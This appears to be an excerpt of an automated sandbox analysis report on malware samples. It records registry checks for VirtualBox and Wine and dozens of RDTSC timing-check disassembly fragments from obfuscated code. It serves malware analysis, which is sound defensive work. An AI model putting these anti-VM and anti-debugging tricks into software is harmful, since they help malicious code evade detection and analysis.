                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 687214 second address: 687230 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F69D121AB31h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 687230 second address: 68723A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push ebx 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 690A3E second address: 690A44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 690B73 second address: 690B79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 690B79 second address: 690B7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 690B7D second address: 690B84 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 690B84 second address: 690B97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F69D121AB2Ch 0x0000000c rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 690E7D second address: 690E83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 690E83 second address: 690E99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F69D121AB2Ch 0x0000000f rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 693ED0 second address: 693EE1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 popad 0x00000011 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 693EE1 second address: 693EE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 693EE7 second address: 693F00 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F69D1080A46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 jnp 00007F69D1080A46h 0x00000019 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 693F74 second address: 693F94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D121AB38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 693F94 second address: 693F98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 693F98 second address: 693F9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 693F9C second address: 694007 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 ja 00007F69D1080A50h 0x0000000e nop 0x0000000f mov esi, 3C87273Eh 0x00000014 push 00000000h 0x00000016 jmp 00007F69D1080A52h 0x0000001b call 00007F69D1080A49h 0x00000020 push edi 0x00000021 push edx 0x00000022 jmp 00007F69D1080A4Bh 0x00000027 pop edx 0x00000028 pop edi 0x00000029 push eax 0x0000002a jmp 00007F69D1080A57h 0x0000002f mov eax, dword ptr [esp+04h] 0x00000033 pushad 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 popad 0x00000038 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 694007 second address: 694015 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F69D121AB26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 694015 second address: 6940B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push edi 0x0000000a push edi 0x0000000b jmp 00007F69D1080A4Eh 0x00000010 pop edi 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 push esi 0x00000017 pushad 0x00000018 push edi 0x00000019 pop edi 0x0000001a jg 00007F69D1080A46h 0x00000020 popad 0x00000021 pop esi 0x00000022 pop eax 0x00000023 mov dword ptr [ebp+122D34F2h], edi 0x00000029 push 00000003h 0x0000002b push 00000000h 0x0000002d push ecx 0x0000002e call 00007F69D1080A48h 0x00000033 pop ecx 0x00000034 mov dword ptr [esp+04h], ecx 0x00000038 add dword ptr [esp+04h], 00000015h 0x00000040 inc ecx 0x00000041 push ecx 0x00000042 ret 0x00000043 pop ecx 0x00000044 ret 0x00000045 push 00000000h 0x00000047 add dword ptr [ebp+122D3065h], eax 0x0000004d push 00000003h 0x0000004f push A7A07264h 0x00000054 jmp 00007F69D1080A4Bh 0x00000059 add dword ptr [esp], 185F8D9Ch 0x00000060 jmp 00007F69D1080A58h 0x00000065 lea ebx, dword ptr [ebp+12448DF5h] 0x0000006b xor cl, FFFFFFA1h 0x0000006e push eax 0x0000006f jns 00007F69D1080A61h 0x00000075 push eax 0x00000076 push edx 0x00000077 pushad 0x00000078 popad 0x00000079 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 694103 second address: 694108 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 69426D second address: 6942AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007F69D1080A48h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 00000016h 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 push 00000000h 0x00000027 mov dword ptr [ebp+122D2D22h], eax 0x0000002d push 2EE5475Eh 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 push esi 0x00000036 pop esi 0x00000037 pushad 0x00000038 popad 0x00000039 popad 0x0000003a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6A5D51 second address: 6A5D63 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F69D121AB26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6A5D63 second address: 6A5D69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6B4D30 second address: 6B4D44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jnc 00007F69D121AB26h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6B4D44 second address: 6B4D52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F69D1080A46h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6B2F0E second address: 6B2F14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6B2F14 second address: 6B2F21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007F69D1080A46h 0x0000000d rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6B2F21 second address: 6B2F25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6B31DF second address: 6B31E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6B336C second address: 6B338A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F69D121AB39h 0x00000009 popad 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6B3A6D second address: 6B3A73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6B3A73 second address: 6B3A78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6B3A78 second address: 6B3A7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6B3BC4 second address: 6B3BF3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D121AB32h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F69D121AB33h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6B3BF3 second address: 6B3BF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6B3D59 second address: 6B3D5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6B3D5F second address: 6B3D65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6B3D65 second address: 6B3D69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6B3D69 second address: 6B3D6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6B3D6F second address: 6B3D95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnc 00007F69D121AB26h 0x0000000d push edi 0x0000000e pop edi 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F69D121AB30h 0x0000001b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6B3D95 second address: 6B3D9A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6B4596 second address: 6B459A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6B459A second address: 6B45AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F69D1080A4Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6B45AA second address: 6B45DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 jmp 00007F69D121AB31h 0x0000000c pop ebx 0x0000000d jmp 00007F69D121AB36h 0x00000012 popad 0x00000013 pushad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6B472F second address: 6B473A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6B473A second address: 6B4753 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F69D121AB35h 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6B4BBD second address: 6B4BC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6B4BC1 second address: 6B4BC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6B9DD4 second address: 6B9DD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6BA26A second address: 6BA28B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F69D121AB2Ch 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jc 00007F69D121AB2Ch 0x00000014 ja 00007F69D121AB26h 0x0000001a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6BA573 second address: 6BA577 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6BA577 second address: 6BA581 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F69D121AB26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6BA581 second address: 6BA59A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F69D1080A46h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f je 00007F69D1080A54h 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6BA59A second address: 6BA59E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6BA6FB second address: 6BA718 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F69D1080A58h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6C0654 second address: 6C065A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6C065A second address: 6C065E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6C065E second address: 6C067B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D121AB30h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push esi 0x0000000d pop esi 0x0000000e pop ecx 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6C0AC9 second address: 6C0AD8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push edx 0x00000006 pop edx 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6C0DB3 second address: 6C0DC2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jg 00007F69D121AB26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6C1029 second address: 6C1048 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D1080A57h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6C185D second address: 6C1861 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6C18EF second address: 6C18FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6C18FA second address: 6C1931 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D121AB31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007F69D121AB32h 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push edi 0x00000015 pushad 0x00000016 jo 00007F69D121AB26h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6C1931 second address: 6C193E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 mov eax, dword ptr [eax] 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6C193E second address: 6C1959 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c popad 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 jo 00007F69D121AB30h 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a pop eax 0x0000001b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6C1D1C second address: 6C1D3D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F69D1080A4Dh 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jp 00007F69D1080A48h 0x00000013 push eax 0x00000014 push edx 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6C1E02 second address: 6C1E09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6C1EC6 second address: 6C1ED3 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F69D1080A46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6C1ED3 second address: 6C1EF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007F69D121AB31h 0x0000000d pushad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6C264C second address: 6C2663 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F69D1080A52h 0x00000009 popad 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6C2663 second address: 6C2668 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6C2738 second address: 6C274B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D1080A4Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6C274B second address: 6C2768 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D121AB2Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007F69D121AB26h 0x00000013 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6C2B2A second address: 6C2B3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007F69D1080A4Ch 0x0000000e rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6C2BC8 second address: 6C2BDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F69D121AB32h 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6C2BDE second address: 6C2C2D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D1080A55h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007F69D1080A48h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 00000017h 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 mov dword ptr [ebp+122D333Fh], ecx 0x0000002c push eax 0x0000002d pushad 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F69D1080A4Ah 0x00000035 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6C3167 second address: 6C3180 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D121AB35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6C3B5B second address: 6C3B5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
